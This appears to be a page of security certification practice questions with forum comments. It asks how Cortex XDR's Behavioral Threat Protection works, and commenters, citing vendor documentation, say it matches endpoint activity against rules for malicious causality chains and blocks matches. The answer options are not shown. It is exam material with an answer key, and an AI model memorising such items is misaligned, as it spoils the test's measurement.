Which statement best describes how Behavioral Threat Protection (BTP) works?
Which statement best describes how Behavioral Threat Protection (BTP) works?
Behavioral Threat Protection (BTP) works by matching Endpoint Detection and Response (EDR) data with rules provided by Cortex XDR. These rules help identify malicious causality chains and take actions such as blocking the threats. This approach ensures continuous monitoring of endpoint activity to catch sophisticated attacks leveraging built-in OS executables and common administration utilities.
Like nuna957 said, the answer should be C. See the following documentation by Palo Alto: 1) "BTP prevents sophisticated attacks that leverage built-in OS executables and common administration utilities by continuously monitoring endpoint activity for malicious causality chains" 2) "Palo Alto Networks researchers define the causality chains that are malicious and distribute those chains as behavioral threat rules. When the Cortex XDR agent detects a match to a behavioral threat protection rule, the Cortex XDR agent carries out the configured action (default is Block)." 1) https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/Cortex-XDR-Pro-Administrator-Guide/Endpoint-Protection-Capabilities 2) https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/Cortex-XDR-Prevent-Administrator-Guide/Add-a-New-Malware-Security-Profile
is the correct